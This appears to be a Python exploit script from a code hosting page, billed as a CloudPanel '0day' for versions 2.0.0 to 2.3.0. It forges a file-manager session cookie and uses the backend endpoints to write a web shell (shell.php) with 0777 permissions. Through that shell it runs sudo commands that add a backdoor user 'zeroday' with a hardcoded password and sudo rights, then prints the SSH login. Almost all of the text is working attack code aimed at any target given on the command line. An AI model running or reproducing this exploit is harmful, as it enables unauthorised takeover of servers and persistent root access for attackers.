/
exploit2.py
107 lines (93 loc) · 5.11 KB
/
exploit2.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
import subprocess, argparse
import warnings ,os, sys
import ctypes, platform, requests
from colorama import Fore, Back, Style
from datetime import date
warnings.filterwarnings('ignore')
cmd = '/usr/bin/php8.1 Crypto.php'
default_path = '/file-manager/'
parser = argparse.ArgumentParser()
username = 'clp'
tgt = ''
#Use for automatically add new user with sudo privileges
user_add = "useradd zeroday -s /bin/bash -b /tmp"
user_passwd = "echo 'Etharus@1337%0AEtharus@1337' | passwd zeroday"
user_mod = "usermod -aG sudo zeroday"
gains = ["sudo su -c '"+user_add+"'",'sudo su -c "'+user_passwd+'"',"sudo su -c '"+user_mod+"'"]
def execPHP(txt=False):
global cmd
returned_output = ''
if False == txt:
proc = subprocess.Popen(cmd.split(' '), stdout=subprocess.PIPE)
returned_output = proc.stdout.read().decode('utf-8')
else:
cmd = cmd + ' ' + txt
proc = subprocess.Popen(cmd.split(' '), stdout=subprocess.PIPE)
returned_output = proc.stdout.read().decode('utf-8')
return returned_output
def exploit():
global tgt,default_path,username
target = 'https://' + tgt.replace('/','')
ipTarget = tgt.split(':')[0]
crypto = execPHP()
cookie = {'clp-fm':crypto}
try:
request = requests.get(target+default_path,cookies=cookie,verify=False,timeout=5)
if request.status_code == 200:
up_data = {'id':'/htdocs/app/files/public/','name':'shell.php'}
new_ck = {'clp-fm':execPHP(username)}
try:
new_request = requests.post(target+default_path+'backend/makefile',cookies=new_ck,data=up_data,verify=False,timeout=5)
if new_request.status_code == 200:
cdata = {'id':'/htdocs/app/files/public/shell.php','content':open('shell.php','rb').read()}
try:
crequest = requests.post(target+default_path+'backend/text',cookies=new_ck,data=cdata,verify=False,timeout=5)
if crequest.status_code == 200:
pdata = {'id':'/htdocs/app/files/public/shell.php','permissions':'0777'}
try:
prequest = requests.post(target+default_path+'backend/permissions',cookies=new_ck,data=pdata,verify=False,timeout=5)
if prequest.status_code == 200:
shell_check = requests.get(target+'/shell.php',verify=False,timeout=5)
if shell_check.status_code == 200:
print(Style.BRIGHT + Fore.GREEN + '[+] WebShell : ' + target+'/shell.php')
for gain in gains:
requests.get(target+'/shell.php?cmd='+gain,verify=False,timeout=10)
print(Style.BRIGHT + Fore.GREEN + '[+] SSH Login : user=zeroday,pass=Etharus@1337')
except:
print(Style.BRIGHT + Fore.RED+'Connection error while changing permission!')
except:
print(Style.BRIGHT + Fore.RED+'Connection error while trying insert contents!')
except:
print(Style.BRIGHT + Fore.RED+'Connection error while trying creating file!')
else:
print(Style.BRIGHT + Fore.RED+'Not Vulnerable...')
except:
print(Style.BRIGHT + Fore.RED+'Connection error!')
def StartPage():
global tgt,prt
parser.add_argument('-T','--target',dest='tgt',type=str, help='Ex: 127.0.0.1:8443',default=None, required=True)
args = parser.parse_args()
tgt = args.tgt
exploit()
if __name__ == '__main__':
today = date.today()
d2 = today.strftime("%B %d, %Y")
if platform.system()=='Linux':
os.system('clear')
sys.stdout.write("\x1b]2;CLP 0Day {}\x07".format(d2))
else:
os.system('cls')
ctypes.windll.kernel32.SetConsoleTitleW(f'CLP 0Day | {d2}')
print(f"""{Style.BRIGHT + Fore.GREEN}
______ _____ _____ __ _
/ ____/___ _/ / (_)___ ____ _/ ___// /__(_)__ _____
/ /_ / __ `/ / / / __ \/ __ `/\__ \/ //_/ / _ \/ ___/
/ __/ / /_/ / / / / / / / /_/ /___/ / ,< / / __(__ )
/_/ \__,_/_/_/_/_/ /_/\__, //____/_/|_/_/\___/____/
/____/ CloudPanel 0day Version : 2.0.0 >= 2.3.0
{Style.BRIGHT + Fore.MAGENTA}
░█▀▄░█▀█░▀█▀░█▀█░█▀▀░█░█░░░░█▄█░█░█
░█░█░█▀█░░█░░█▀█░█░░░█▀▄░░░░█░█░░█░
░▀▀░░▀░▀░░▀░░▀░▀░▀▀▀░▀░▀░▀░░▀░▀░░▀░
{Style.BRIGHT + Fore.WHITE}""")
StartPage()